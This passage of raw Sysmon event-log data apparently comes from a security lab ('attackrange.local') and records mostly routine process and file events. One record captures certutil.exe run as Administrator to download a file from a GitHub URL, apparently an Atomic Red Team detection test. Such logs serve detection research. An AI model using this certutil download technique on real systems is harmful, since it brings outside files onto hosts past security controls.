21:49:59.933{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917712Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.933{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000005917711Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917710Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.731{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917709Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:59.385{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED07357C40264FCB0DB060171895C72,SHA256=1D78D5C2EE2568FD90EA2260528FA9F874C8BBEB8E600EA45916444E8FFEACD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638523Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:59.835{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06918654C97DB3182C097A351F54052C,SHA256=7B44DABE556343C66BCE779EABF54851028699907D28AB57E5D1EA51257CF3B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638526Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.537{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57255-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638525Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:00.851{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ACD3A470727D21FC697229D4C358CF0,SHA256=DCB4F7610C5F814D051D3D23242EE30D2358E31322F0CE9FB28EA6D611AD17C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917751Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.995{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A0BB552C2F063F276D24D8A7C3BA2FB,SHA256=92407A8214DC5057102050DEBD83632756EA9BBFEAD6C7F12F7F2093D1C15905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917750Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.994{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E0FD617A1E4BF72A616B5DDEDCCE19,SHA256=9417BC8A52B993058E08F838C158772DB3500714AA2B51ABD9D0583EBD768A82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917749Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.994{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=123954D12412D48F2C38A26120057493,SHA256=7976854EE859D4B9A99B55001A76A4949F919E833E5DC7E865D2A6AAE7AD8666,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917748Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917747Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917746Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.055{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917745Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.055{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917744Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.050{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917743Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.050{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917742Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.050{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917741Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.046{896A638B-B407-605B-8369-00000000AE01}1220ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.binMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917740Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.001{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917739Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:00.001{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B407-605B-8369-00000000AE01}1220C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638524Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:00.288{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBBF666FCD57B8B6875F388919283D60,SHA256=0EF855246881C097075036CBF81706F9108B8AFF56AC5A8FBECCA49552E9F8EF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638541Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.929{BFB545BB-B409-605B-2C5A-00000000AF01}34961752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638540Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.866{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63E4C8C6EC088C4D2B60289B9097A79F,SHA256=E96E0817F4E28987AEC8AF3F75CB5EF39AAD3CAC37EFFEA26DCC2262138BE1FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917754Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:01.857{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DEF14881CE8D8CBFA6E9DBE06F047A,SHA256=21E09DF3782AE9528DDFAAFAEAB68A9417541BFCF6C71267276156C41E711602,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638539Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B409-605B-2C5A-00000000AF01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638538Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638537Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638536Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638535Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638534Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638533Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638532Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638531Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 